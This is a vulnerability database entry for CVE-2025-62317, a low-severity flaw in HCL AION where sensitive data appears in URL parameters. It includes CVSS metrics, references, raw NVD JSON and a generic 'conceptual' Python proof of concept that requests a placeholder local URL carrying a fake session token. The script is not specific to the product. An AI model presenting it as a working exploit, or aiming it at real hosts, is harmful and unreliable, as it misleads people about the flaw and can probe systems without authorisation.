CVE-2025-62317

Description

HCL AION is affected by a vulnerability where sensitive information may be included in URL parameters. Passing sensitive data in URLs may expose it through browser history, logs, or intermediary systems, potentially leading to unintended information disclosure under certain conditions.

CVSS Details

CVSS Score

2.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HCL AION (具体受影响版本请参考官方公告 KB0130636)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual Proof of Concept for CVE-2025-62317
# This script demonstrates how sensitive data in URL parameters can be exposed.

import requests

def check_sensitive_data_leak():
    target_domain = "http://vulnerable-hcl-aion.local"
    endpoint = "/account/details"
    
    # Simulating a vulnerable request where sensitive data is in URL
    # Example: Session token or user ID passed via GET
    sensitive_token = "sess_id_987654321_sensitive"
    user_id = "admin_user"
    
    # Constructing the vulnerable URL
    full_url = f"{target_domain}{endpoint}?token={sensitive_token}&uid={user_id}"
    
    print(f"[+] Sending request to: {full_url}")
    
    try:
        response = requests.get(full_url)
        if response.status_code == 200:
            print(f"[+] Request successful. The URL containing sensitive data is now logged in:")
            print(f"    - Browser History")
            print(f"    - Proxy/Server Logs")
            print(f"    - Referer headers (if links are clicked)")
            print(f"[!] Sensitive Data Exposed: {sensitive_token}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    check_sensitive_data_leak()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62317
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62317
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62317/
[4] VulDB https://vuldb.com/cve/CVE-2025-62317
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62317", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:19.107", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where sensitive information may be included in URL parameters. Passing sensitive data in URLs may expose it through browser history, logs, or intermediary systems, potentially leading to unintended information disclosure under certain conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-598"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}